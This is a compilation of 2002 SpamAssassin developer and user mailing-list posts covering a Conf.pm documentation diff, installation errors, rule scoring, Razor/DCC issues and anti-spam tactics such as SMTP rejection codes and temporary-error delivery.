In directory usw-pr-cvs1:/tmp/cvs-serv17809/lib/Mail/SpamAssassinModified Files:
      Tag: b2_4_0
	Conf.pm 
Log Message:
added deprecation regarding starting line with space; reserved for future use; also changed sample version_tagIndex: Conf.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
retrieving revision 1.91.2.7
retrieving revision 1.91.2.8
diff -b -w -u -d -r1.91.2.7 -r1.91.2.8
--- Conf.pm	29 Aug 2002 14:52:43 -0000	1.91.2.7
+++ Conf.pm	4 Sep 2002 15:22:39 -0000	1.91.2.8
@@ -24,8 +24,11 @@
 files, loaded from the /usr/share/spamassassin and /etc/mail/spamassassin
 directories.
-The C&lt;#&gt; character starts a comment, which continues until end of line,
-and whitespace in the files is not significant.
+The C&lt;#&gt; character starts a comment, which continues until end of line.
+
+Whitespace in the files is not significant, but please note that starting a
+line with whitespace is deprecated, as we reserve its use for multi-line rule
+definitions, at some point in the future.
 Paths can use C&lt;~&gt; to refer to the user's home directory.
@@ -257,7 +260,7 @@
 eg.
-  version_tag perkel2    # version=2.40-perkel2
+  version_tag myrules1    # version=2.41-myrules1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</si>
  <si>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On Thursday 05 September 2002 04:10 CET Mike Burger wrote:
&gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and
&gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running
&gt; on it.
&gt;
&gt; I'm getting messages that seem to indicate that SA can't find
&gt; PerMsgStatus, like so:
&gt;
&gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML
&gt; SpamAssassin test, skipping: ^I(Can't locate object method
&gt; "check_for_content_type_just_html" via package
&gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load
&gt; "Mail::SpamAssassin::PerMsgStatus"?) at
&gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line
&gt; 1814,  line 21. )
&gt;
&gt;[...]
&gt;
&gt; Any ideas?Perl doesn't complain that it can't find PerMsgStatus.pm but the function 
check_for_content_type_just_html(). Do you probably have some old rules 
files still lurking around? This test existed in 2.31 but is gone/was 
renamed with 2.40.Malte--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</si>
  <si>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I'm getting an error page from sourceforge.net when I try to go to
www.spamassassin.org. Just FYI. 
-- 
Larry Rosenman                     http://www.lerctr.org/~ler
Phone: +1 972-414-9812                 E-Mail: ler@lerctr.org
US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749-------------------------------------------------------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</si>
  <si>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"Clark C . Evans" said:&gt; Hello.  I'm hosted on a FreeBSD box where I can't modify the
&gt; local Perl installation.  I downloaded and installed procmail
&gt; in my home directory, and now I'm trying to get spamassassin to work...
&gt; 
&gt; bash-2.05$ perl Makefile.PL PREFIX=/home/cce SYSCONFDIF=/home/cce/etc
&gt; Warning: prerequisite HTML::Parser 0 not found at (eval 1) line 219.
&gt; Warning: prerequisite Pod::Usage 0 not found at (eval 1) line 219.
&gt; 'SYSCONFDIF' is not a known MakeMaker parameter name.SYSCONFDIR.--j.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</si>
  <si>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"Kerry Nice" said:&gt; What about some reality check rules.  Yeah, you can pack in lots of things
&gt; into the header to try and get some negative points, but do they all make
&gt; sense in combination.  Can you have a Pine message id in the same header
&gt; with an Outlook Express one or a Mutt User-Agent?Yes, this is a big bonus of meta rules (new in 2.40); we can now
e.g. check for an Outlook-style forwarded message, and not give
it negative points unless it contains other signs of being from
Outlook.&gt; I think the headers should be paid special attention to.  The message
&gt; content of something from the NY Times or Lockergnome might look spammy, but
&gt; usually they don't forge or fake anything in the header.  Tone down the
&gt; negative scores and ding them extra for any obvious forgeries.When we get more (good) "nice" tests, the GA will assign lower
scores to them.  I think the current problem is that there are
very few really good nice tests in the current rulebase, and lots
of +ve tests that those newsletters hit, giving the GA a big
problem to solve.--j.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</si>
  <si>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Jesus Climent said:&gt; d output: Bareword found where operator expected at (eval 11) line 95,
&gt; near "25FREEMEGS_URL_uri_test"  (Missing operator before
&gt; FREEMEGS_URL_uri_test?) Bareword found whe&gt; Is that a bug or is a fault in my system?looks like there's an out-of-date copy of the rules files, on your system.
that rules is called "FREEMEGS_URL" nowadays.--j.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</si>
  <si>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BTW, I've been thinking a little about the RPMs and other packages.
Already the PLD guys are distributing 3 rpms:  - perl-Mail-SpamAssassin          the perl modules.  - spamassassin          the "spamassassin" and "spamd" scripts,
          spamd rc-file etc.  - spamassassin-tools          mass-check, masses directory stuff, etc.
          for generating rescore data from corpora.This seems like a good way to do it; this way, stuff which just needs
the perl modules doesn't need to require the full RPM be installed,
with RC files in init.d etc.It's been adopted in the distributed .spec file, anyway.Theo, BTW, what's the eval test you add in the tvd version of the RPM?--j.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</si>
  <si>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It's possible...I performed the update via "rpm -U"...which, of course, 
created all the new rulesets as "xx_rulename.cf.rpmnew"  Crud.  I'll have 
to start moving things around.On Thu, 5 Sep 2002, Malte S. Stretz wrote:&gt; On Thursday 05 September 2002 04:10 CET Mike Burger wrote:
&gt; &gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and
&gt; &gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running
&gt; &gt; on it.
&gt; &gt;
&gt; &gt; I'm getting messages that seem to indicate that SA can't find
&gt; &gt; PerMsgStatus, like so:
&gt; &gt;
&gt; &gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML
&gt; &gt; SpamAssassin test, skipping: ^I(Can't locate object method
&gt; &gt; "check_for_content_type_just_html" via package
&gt; &gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load
&gt; &gt; "Mail::SpamAssassin::PerMsgStatus"?) at
&gt; &gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line
&gt; &gt; 1814,  line 21. )
&gt; &gt;
&gt; &gt;[...]
&gt; &gt;
&gt; &gt; Any ideas?
&gt; 
&gt; Perl doesn't complain that it can't find PerMsgStatus.pm but the function 
&gt; check_for_content_type_just_html(). Do you probably have some old rules 
&gt; files still lurking around? This test existed in 2.31 but is gone/was 
&gt; renamed with 2.40.
&gt; 
&gt; Malte
&gt; 
&gt;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</si>
  <si>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I finally found the SpamAssassin ninja's!  After months of searchng.. I
found the litte guys at a bowling alley in Valencia!  Here's a shot of my
beloved clan!http://www.mattahfahtu.com/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</si>
  <si>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sorry for the dupe.. thought the com address would bounce.. my bad.-------------------------------------------------------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</si>
  <si>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On Fri, Sep 06, 2002 at 06:22:52PM +0100, Matt Sergeant wrote:
&gt; Can anyone out there who uses SA with lotus notes users help us figure 
&gt; out what to tell customers to do when they've got emails coming in with 
&gt; spam identifying headers? We've been told that Notes has no way to 
&gt; handle extra headers, but I'm sure that can't be universally true.
&gt; 
&gt; I've searched the 'net, and it seems that Notes can only filter based on 
&gt; the "visible" headers, i.e. sender, subject, precedence, etc. Is there 
&gt; any way to filter based on X- headers?=&gt; Yes the only way out with Notes looks like changing the subject 
(subject_tag).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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=840------- Additional Comments From felicity@kluge.net  2002-09-06 10:56 -------
Subject: Re: [SAdev]  spam_level_char option change/removalOn Fri, Sep 06, 2002 at 10:09:19AM -0700, bugzilla-daemon@hughes-family.org wrote:
&gt; another (or would look terrible).  Let's just use a letter.  If
&gt; aesthetics are your concern, I think an "x" will look just fine."x" is fine, but let's not take out the config option.  if people really
want to have it be something else, we shouldn't hinder them.-------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</si>
  <si>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On Saturday 07 September 2002 23:22 CET Daniel Quinlan wrote:
&gt; Craig Hughes  writes:
&gt; &gt; How about configuring SA to set precendence to "low" for spam
&gt; &gt; messages, then filter on that -- no real human I've ever seen has
&gt; &gt; actually set precendence to low on real mail.
&gt;
&gt; Assuming there isn't a better way for Lotus Notes users, we could
&gt; create a "Precedence: spam" convention.  The only two Precedence:
&gt; headers I've seen (aside from one or two odd messages) are "bulk" and
&gt; "list".  Adding a "spam" header makes sense given the convention.I'd suggest using Precedence: junk. Albeit it's no standard header does most 
Software already recognize it. Courier eg. doesn't send auto-replies to 
mails with the Precedence bulk or junk. I think Outlook does handle these 
special, too. [1] says:
| Autoresponses should always contain the header
|          Precedence: junk
| Notice the spelling of "prec-e-dence". In particular, count the number of
| n:s (and a:s and s:es, if you're totally agraphic and/or from the United
| States). This will prevent well-tempered mail programs from generating
| bounce messages for these. If the recipient can't be reached, the
| autoresponder message is simply discarded. 
| [...]
| (For what it's worth, the meaning of the Precedence header in practice is
| that it affects Sendmail so that messages identified as less important get
| moved back in the queue under high load. [...])&gt;[...]Malte[1] Moronic Mail Autoresponders (A FAQ From Hell):
http://www.ling.helsinki.fi/users/reriksso/mail/autoresponder-faq.html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</si>
  <si>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I thought I'd installed razor correctly, but I am seeing the following in my 
logs.  Can anyone give me a hitn?Sep  8 06:46:45 omega spamd[6514]: razor2 check skipped: No such file or 
directory Can't locate object method "new" via package "Net::DNS::Resolver" 
(perhaps you forgot to load "Net::DNS::Resolver"?) at (eval 31) line 1, 
 line 114. ^I...propagated at 
/usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 392,  
line 114.--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</si>
  <si>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Despite my lack of confidence to upgrade to 2.41 using the tarball instead of 
cpan, it worked.  With the help of others, got razor working.  I did however 
notice something in my logs which happened twice but hasn't recurred.Sep  8 16:10:11 omega spamd[14014]: razor2 check skipped: Permission denied 
Can't call method "log" on unblessed reference at 
/usr/lib/perl5/site_perl/5.6.1/Razor2/Client/Agent.pm line 211,  line 
66.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</si>
  <si>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On Monday 09 September 2002 11:13 CET Matt Sergeant wrote:
&gt; Malte S. Stretz wrote:
&gt; &gt;[...]
&gt; &gt; So I'd vote for a complete removal of 60_whitelists.cf and a page
&gt; &gt; http://spamassassin.org/tests/whitelists.html where we list common
&gt; &gt; whitelist entries instead.
&gt;
&gt; I would happily agree to that.
&gt;
&gt; Though maybe it should be a wiki... ;-)Just imagine what Ronnie Scelson would do to a wiki *shudder*M
-- 
--- Coding is art.
--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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=486------- Additional Comments From larry@5points.net  2002-09-10 08:45 -------
Dan,To answer your question to my post (which maybe should be a seperate bug?) I'm 
using Spamassassin version 2.30-------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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "CW" == Carlo Wood  writes:CW&gt; to manually decode the base64 part.
CW&gt; Can someone please tell me how to do that?
google: base64 decodethe first three results look useful.
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 11 September 2002 16:19 CET Justin Mason wrote:
&gt; Malte S. Stretz said:
&gt;[...]
&gt; &gt; I think we should even add new (GA'd) rules to 2.4x (and/or remove old
&gt; &gt; ones) and tag a new 2.50 only if we have a bunch of features worth a
&gt; &gt; "dangerous" big update. I'd say: Yes, you should expect 2.42 and also
&gt; &gt; 2.43+ (but update to 2.41 now).
&gt;
&gt; I would think adding new rules to, or removing broken rules from, 2.4x
&gt; would require some discussion first.  but new GA'd scores are definitely
&gt; worth putting in, as the ones there are too wild.I think my mail wasn't very clear ;-) My point was that we should continue 
releasing new rules and removing broken ones (all based on discussions on 
this list of course) in the 2.4 branch instead of creating a new 2.5 branch 
everytime we have a bunch of new rules.A new branch should be openend only if (big) new features are introduced 
(eg. Bayes) or the interface has changed (spam_level_char=x). As the rules 
are under fluent development, the user has to update quite regularly. But 
currently he couldn't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update.All just IMHO :o)
MalteP.S.: I'll be away from my box and my mail account for one week, starting 
tomorrow. So happy coding for the next week :-)-- 
--- Coding is art.
-- </t>
  </si>
  <si>
    <t xml:space="preserve">This is not directly SpamAssassin related, but more of a general
dealing-with-SPAM issue.What is the best way to deal with SPAM during the SMTP transaction?
There are domains and addresses that I know are SPAM at the 'MAIL
FROM' and can deal with at the SMTP level. I have been, and I think
most people, respond with a 5.7.1 code, a "permanent" error. That
pretty much means, "Don't bother to try from that address again,
you'll get the same error." People often add cathartic messages to
accompany the 550 like, "Spammers must die."But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methods.Then there is a third possibility. Instead of returning a 550 code
indicating you're on to the spammer, fake a 5.1.1 response which is
saying "mailbox does not exist." This would be in the hopes that some
spammers out there actually remove names reported as non-existent from
their lists. I know, a slim hope, but even if only a few do, it can
lower the incidence.So, what are the arguments for each? Do spammers even look at _any_ of
the bounce messages they get? The volume of bounces must be
huge. Personally, I'm starting to think blackholes are the way to
go... But sending back that "Spammer die, die, die," or stock "Access
DEE-NIED!" (my ephasis added) message can be pretty satisfying. ;)
-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
Robert Strickler said:&gt; Looks like we need an identity stamp in the X-Spam headers so that SA only
&gt; accepts headers from authorized sources.Well, SpamAssassin will just ignore any old X-Spam-whatever headers
it finds, so that cannot be used to get around the filter.--j.
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002, Stephane Lentz wrote:&gt; =&gt; I faced a similar problem with the FreeBSD when trying to 
&gt; install SpamAssassin through the ports on my fresh FreeBSD 4.6.2. 
&gt; I had to define PERL5LIB with some given order of directories
&gt; so that the latest File::Spec module get used. Good to hear it's not just me.  Mind telling me how you set PERL5LIB
specificly? I've tried a few things (setenv in the shell, as well as
$PERL5LIB == ...inside the Makefile.PL, even on the perl command
line..) with no success.thanks...david
---
david raistrick
drais@atlasta.net		http://www.expita.com/nomime.html
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">I successfully installed spamassassin &amp; razor to run system wide on my
Debian Woody server.  
Briefly I 
apt-get installed spamassassin razor and libmilter-dev,
downloaded spamass-milter-0.1.2.tar.gz from http://www.milter.org,
ungzipped and untarred the file into /etc/mail, 
followed the directions in /etc/mail/spamass-milter-0.1.2/README to
compile the milter, install the rc scripts, and edit and update
sendmail.mc
changed /etc/default/spamassassin to set spamassassin to daemon mode.
verified that spamassassin was running by tailing /var/log/mail.log
Woody/stable has SA 2.20
Woody/unstable has SA 2.41I'm running the stable source live right now and it is working very
well.If you want unstable change /etc/apt/sources.list, substituting
"unstable" for "stable",
Run apt-get update
Install the unstable versions
Change /etc/apt/sources.list
Run apt-get update
Quentin Krengel
Krengel Technology Inc-----Original Message-----
From: spamassassin-talk-admin@example.sourceforge.net
[mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of
Tanniel Simonian
Sent: Wednesday, September 11, 2002 4:15 PM
To: spamassassin-talk@example.sourceforge.net
Subject: [SAtalk] Debianized Packages for SA 2.3+
Im currently using woody.Is there a debianized package for SA on Woody, or at least somewhere I
can download from? Its been soo long that I haven't compiled stuff, that
Im sort of shy to try again. =)-- 
Tanniel Simonian
Programmer / Analyst III
UCR Libraries
http://libsys.ucr.edu
909 787 2832
-------------------------------------------------------
In remembrance
www.osdn.com/911/ _______________________________________________
Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">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softwarePERL5LIB is explained perlrun(1) : do 
# man perlrun for more informationRegards, SL/
---
Stephane Lentz / Alcanet International - Internet Services
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">So far today, I've found eff.org and mandrakesoft.com in DCC.  My confidence 
in DCC is beginning to drop.
-- 
Robin Lynn Frank
Paradigm-Omega, LLC
==================================
No electrons were harmed in the sending
of this message.  However, two neutrons and 
a proton complained about the noise.
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002, Vince Puzzella wrote:&gt; Ever since I set defang_mime 0 all spam that contains HTML has a badly
&gt; formatted report.  I think/realize it's because the report should be in
&gt; HTML.  Is there anyway to get Spamassassin to add an HTML report in
&gt; cases where it is required (defang_mime 0)?Funny, I was in the middle of composing the same message when I saw yours.It would be nice if it sees a header like:
Content-type: text/html; charset=iso-8859-1and defang_mime is 0, it could wrap the report with  for ease
of reading?And the same sort of problem seems to occur with base64 encoded messages.
The report is placed inside of the mime boundary:
------=_NextPart_000_00B7_31E64A2B.B8441E37
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: base64
Should this not go above (probably in it's own mime section,) to make sure
that the attachments don't get destroyed?Ian-------------------------------------------
Ian White
email: iwhite@victoria.tc.ca
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/11/2002 at 10:01 AM  spamassassin-talk-request@lists.sourceforge.net
spamassassin-talk@lists.sourceforge.net wrote:
&gt;Message: 15
&gt;From: Vivek Khera 
&gt;Date: Wed, 11 Sep 2002 10:06:55 -0400
&gt;To: spamassassin-talk@example.sourceforge.net
&gt;Subject: Re: [SAtalk] Calypso email = ratware? 
&gt;
&gt;&gt;&gt;&gt;&gt;&gt; "JM" == Justin Mason  writes:
&gt;
&gt;JM&gt; Now all we need to do is get all the SpamAssassin users out there to
&gt;JM&gt; upgrade...
&gt;
&gt;Considering that the rules need to adapt to the changing look and feel
&gt;of spam vs. non-spam, does it make sense to have SA automatically
&gt;issue a notice when it is, say 9 months old, recommending that the
&gt;user/operator check for updated rules?
&gt;
&gt;Sort of like a nag-ware feature, but in self-defense for the user, not
&gt;the vendor ;-)
&gt;
&gt;-- 
&gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
&gt;Vivek Khera, Ph.D.                Khera Communications, Inc.
&gt;Internet: khera@kciLink.com       Rockville, MD       +1-240-453-8497
&gt;AIM: vivekkhera Y!: vivek_khera   http://www.khera.org/~vivek/better yet would be a built-in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www.RoseCitySoftware.com strictly because of joe-average-user concerns
about spyware and "phoning home", but in cases where the app needs to
access the internet anyhow, we have done it with great success and minimal
concern by our users.----
Joseph Burke
President/CEO
InfiniSource, Inc.
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Anyway I'm making good progress and my implementation works reasonably
&gt;well.  It now seems blindingly clear that we want a tightly-integrated
&gt;implementation of Naive Bayes spam/nonspam classification.  There are
&gt;still some things about how to do this right inside SA that I still am
&gt;figuring out.
&gt;
&gt;DanThis is very good news! Will this allow for individual spam word file
preferences when spamassassin is running on a mailserver for multiple
users? This would be an outstanding addition if it can be done. Thanks
much for a great project.-- 
Regards,Eric Mings Ph.D.-------------------------------------------------------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</si>
  <si>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Op 12-09-2002 00:35 schreef Ellen Clary (ellen@dgi.com):&gt;&gt; Then there is a third possibility. Instead of returning a 550 code
&gt;&gt; indicating you're on to the spammer, fake a 5.1.1 response which is
&gt;&gt; saying "mailbox does not exist." This would be in the hopes that some
&gt;&gt; spammers out there actually remove names reported as non-existent from
&gt;&gt; their lists. I know, a slim hope, but even if only a few do, it can
&gt;&gt; lower the incidence.
&gt; 
&gt; They don't, I can guarantee that.  Quite a few spamtraps nowadays
&gt; operate by 5nn'ing for 6 months in the hope of getting legit mailers
&gt; to remove bouncing addrs from lists;  then after 6 months, they just
&gt; spamtrap all incoming mail to those addrs.  (unfortunately a lot of
&gt; legit mailers don't bother cleaning their lists either.)Most spammers don't check reply codes at all, they just send out as many
mails as their system will hold without checking for any confirmation.A trick to lower spam reception was dicussed on the postfix mailing list
some time ago: answer all incoming mail with a 4xx temporary error code when
it is offered the first time, and accept it the second time. Apparently most
mass-emailers don't even try to deliver a second time.-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh. RTFM.. Sorry about that.Yep, that did the trick.Thanks for the help!Regards,
Paul Fries
paul@cwie.net-----Original Message-----
From: spamassassin-talk-admin@example.sourceforge.net
[mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of
Vince Puzzella
Sent: Thursday, September 12, 2002 11:23 AM
To: Paul Fries; spamassassin-talk@example.sourceforge.net
Subject: RE: [SAtalk] 2.41/2.50 spamd/spamc problemdefang_mime 0-----Original Message-----
From: Paul Fries [mailto:paul@cwie.net] 
Sent: Thursday, September 12, 2002 2:12 PM
To: spamassassin-talk@example.sourceforge.net
Subject: [SAtalk] 2.41/2.50 spamd/spamc problem
I noticed that after upgrading to 2.41 (or 2.50) from 2.31, the -F
option was removed from spamd. This is fine because all of the HTML format mail seems to arrive
properly. However, messages that get tagged as Spam arrive as just html
source.Is there any way around this? I would like all HTML/RTF messages to
retain their formatting even if they are flagged as spam. I would
accomplish this on 2.31 by using the "-F 0" flag when starting spamd.Thanks!Regards,
Paul Fries
paul@cwie.net
CWIE LLC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</si>
  <si>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-----Original Message-----
&gt; From: carlo@alinoe.com [mailto:carlo@alinoe.com]
&gt; Sent: 13 September 2002 14:21
&gt; To: spamassassin-talk@example.sourceforge.net
&gt; Subject: [SAtalk] Getting yourself removed from spam lists
&gt;
&gt; I get the feeling that the spammers never
&gt; remove emails from their lists.Correct...&gt; On the other hand, that doesn't make sense:
&gt; wouldn't they get worried about their millions
&gt; of spams being wasted?  Don't they WANT *some*
&gt; prove that they indeed *reach* people somehow?No, they only have to prove that they send several million
emails to 'potential clients' to get their money.  I don't think
they even care much about bounces.  They're con-artists, why
should they care about proving they actually reached people?
&gt; So... it seems to me that they DO clean up
&gt; their lists, but only when a spam fails to
&gt; deliver - or can't they detect that?Most of the time the bounce goes to some poor soul who has
nothing to do with the spammer.&gt; What do spammers do with email addresses in
&gt; their database that are undeliverable for a
&gt; few years?  Do they still continue to spam
&gt; them?Yes.Tony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</si>
  <si>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Fri, 13 Sep 2002 the voices made carlo@alinoe.com write:&gt; What do spammers do with email addresses in
&gt; their database that are undeliverable for a
&gt; few years?  Do they still continue to spam
&gt; them? Yes.
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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This may be a little off topic but thought people here would have a better
response to this elsewhere.I have setup two MX records (mail and bmail) for my mail server. The one I
gave a 10 (bmail) the other a 20 (mail).bmail(10) I gave a 10 because I want all mail to go through this server to
be scanned for SPAM and viruses and then relayed to the mail(20) server for
delivery.As I understand it, DNS A records are used in a rotating fashion for load
balancing, but DNS MX records are used in order or prority, meaning the 10
before the 20 and only 20 if the 10 isn't available.But only some of the mail is actually being scanned which leads me to
believe that not all of the mail is actually hitting that box and the 10
never goes down. Why? Have I got something confused here?Thanks,
V
------- End of Forwarded Message -------
-- 
This message has been scanned for viruses and
dangerous content by MailScanner at comp-wiz.com,
and is believed to be clean.-------------------------------------------------------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</si>
  <si>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Fri, 2002-09-13 at 14:33, vernon wrote:
&gt; 
&gt; But only some of the mail is actually being scanned which leads me to
&gt; believe that not all of the mail is actually hitting that box and the 10
&gt; never goes down. Why? Have I got something confused here?
&gt; 
Sending mail directly to a backup mail server in the hopes that it has
less stringent spam scanning is a common spammer trick.-- 
Jason Kohles                                 jkohles@redhat.com
Senior Engineer                 Red Hat Professional Consulting-------------------------------------------------------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</si>
  <si>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I have searched the list but did not find any info on this. How do I setup multiple spamd machines so that spamc load balances - or 
anything similar? Duane.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</si>
  <si>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On Fri, 13 Sep 2002, Tony L. Svanstrom mused:
&gt; On Fri, 13 Sep 2002 the voices made carlo@alinoe.com write:
&gt; 
&gt;&gt; What do spammers do with email addresses in
&gt;&gt; their database that are undeliverable for a
&gt;&gt; few years?  Do they still continue to spam
&gt;&gt; them?
&gt; 
&gt;  Yes.So much so that I get thousands of bounces per day on this machine aimed
at what are plainly message-ids...-- 
`Let's have a round of applause for those daring young men
 and their flying spellcheckers.' --- Meg Worley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</si>
  <si>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I'm getting these messages and I'm not sure what they mean. Can anyone clear 
this up for me? Thanks.Sep 15 11:45:09 linux mailscanner[6128]: RBL Check ORDB-RBL timed out and 
was killed, consecutive failure 3 of 7
Sep 15 11:45:24 linux mailscanner[6128]: SpamAssassin timed out and was 
killed
-- 
This message has been scanned for viruses and
dangerous content by MailScanner at comp-wiz.com,
and is believed to be clean.-------------------------------------------------------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</si>
  <si>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Sun, 15 Sep 2002 the voices made Marc Perkel write:&gt; Right now we have one spam status flag indicating that a message is or
&gt; is not spam. The idea being that the end user perhaps make a rule that
&gt; would move the spam flagged messages into a spam folder and thus gain
&gt; some time by presorting messages into to piles. If you (people) don't know enough to filter on the actual score they've got
the "stars", which will give them more than enough levers, if they want it.
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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On Sun, 15 Sep 2002, Vernon Webb wrote:&gt; I'm getting these messages and I'm not sure what they mean. Can anyone clear 
&gt; this up for me? Thanks.
&gt; 
&gt; Sep 15 11:45:09 linux mailscanner[6128]: RBL Check ORDB-RBL timed out and 
&gt; was killed, consecutive failure 3 of 7
&gt; Sep 15 11:45:24 linux mailscanner[6128]: SpamAssassin timed out and was 
&gt; killedYour running mailscanner and the timeout used got to check ORDB-RBL is too 
low and your timing out.  mailscanner will count up to seven timeouts and 
then automatically disable these checks until it restarts itself (within 4 
hours).-- 
Gerry"The lyfe so short, the craft so long to learne"  Chaucer-------------------------------------------------------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</si>
  <si>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Tony L. Svanstrom wrote:&gt;On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</si>
  <si>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Has anyone noticed a drop in razor-check performance over the past week?
I disabled the razorchecks in Spamassassin and my queues start to clean
out again.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anybody point me to a project/FAQ similar to this:?1. Perl script fetches POP mail from a distant server
2. mail is fed to SA, running as a standalone module in my user account
3. SA spits out results back to perl script.
4. Script deletes offending mail.I don't have root access.  I don't need a MTA.=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0
Chris Fortune
Fortune's Web Computer Services
Nelson, BC, Canada
V1L 2W3ph#: 250 505-5012
email: cfortune@telus.net
website: http://cfortune.kics.bc.ca/=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0-------------------------------------------------------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
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:&gt;&gt;&gt;   DATE_IN_PAST_48_96
&gt;&gt;&gt;   SPAM_PHRASE_00_01
&gt;&gt;&gt;   SPAM_PHRASE_01_02
&gt;&gt;&gt;   SPAM_PHRASE_02_03
&gt;&gt;&gt;   SPAM_PHRASE_03_05
&gt;&gt;&gt;   SPAM_PHRASE_05_08&gt; I was thinking of just removing those particular rules, but keeping the
&gt; other entries in the range, since they're proving too "noisy" to be
&gt; effective.  But I'd be willing to keep those ones in, all the same.  What
&gt; do you think?  Matt/Craig, thoughts?I think I could handle commenting out the lowest SPAM_PHRASE_XX_YY
scores.  If the GA could handle this sort of thing so they'd
automatically be zeroed, I'd feel better since the ranges could change
next time the phrase list is regenerated or the algorithm tweaked.I think we need to understand why DATE_IN_PAST_48_96 is so low before
we remove it.  The two rules on either side perform quite well.&gt;&gt; And here are the rules that seem like they should be better or should
&gt;&gt; be recoverable:&gt;&gt;&gt;   FROM_MISSING
&gt;&gt;&gt;   GAPPY_TEXT
&gt;&gt;&gt;   INVALID_MSGID
&gt;&gt;&gt;   MIME_NULL_BLOCK
&gt;&gt;&gt;   SUBJ_MISSING&gt; well, I don't like SUBJ_MISSING, I reckon there's a world of mails from
&gt; cron jobs (e.g.) which hit it.Okay, drop SUBJ_MISSING.&gt; But, yes, the others for sure should be recoverable, and I'm sure there's
